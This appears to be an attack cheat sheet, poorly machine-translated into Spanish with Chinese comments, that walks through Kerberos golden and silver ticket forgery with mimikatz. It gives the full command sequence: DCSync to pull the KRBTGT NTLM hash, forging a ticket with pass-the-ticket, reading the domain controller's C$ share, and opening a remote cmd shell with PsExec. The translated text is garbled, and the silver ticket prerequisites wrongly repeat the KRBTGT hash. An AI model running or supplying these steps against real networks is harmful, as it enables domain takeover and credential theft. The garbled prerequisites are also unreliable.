las notas de oro
Requisitos previos
- Nombre de dominio
- valor de SID del campo
- el dominio de cuenta KRBTGT hash NTLM
- Nombre de usuario falso (en este caso el administrador), puede ser cualquier usuario o incluso los usuarios no existentes
uso
Descarga de mimikatz: https://github.com/gentilkiwi/mimikatz
PsExec dirección de descarga: https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
ipconfig /all #获取域名(前提条件1)
whoami /all #获取域SID值(前提条件2)
lsadump::dcsync /domain: /*域名*/ /user:krbtgt #获取KRBTGT账户的 Hash NTLM(前提条件3)
klist purge #删除票证
kerberos::golden /admin:administrator /domain: /*域名*/ /sid: /*SID*/ /krbtgt: /*Hash NTLM*/ /ptt #伪造票据(前提条件4)
dir \\abc.test.com\c$ #查看域控的C盘目录(abc.test.com为域控全名)
PsExec.exe \\abc.test.com cmd #使用PsExec获取一个cmdshell
notas de plata
Requisitos previos
- Nombre de dominio
- valor de SID del campo
- el dominio de cuenta KRBTGT hash NTLM
- Nombre de usuario falso (en este caso es la prueba), puede ser cualquier usuario o incluso los usuarios no existentes
uso
comando de billete falso es el siguiente:
kerberos::golden /domain: /*域名*/ /sid: /*SID值*/ /target: /*域控全名*/ /service:cifs /rc4:/*Hash NTLM*/ /user:test /ptt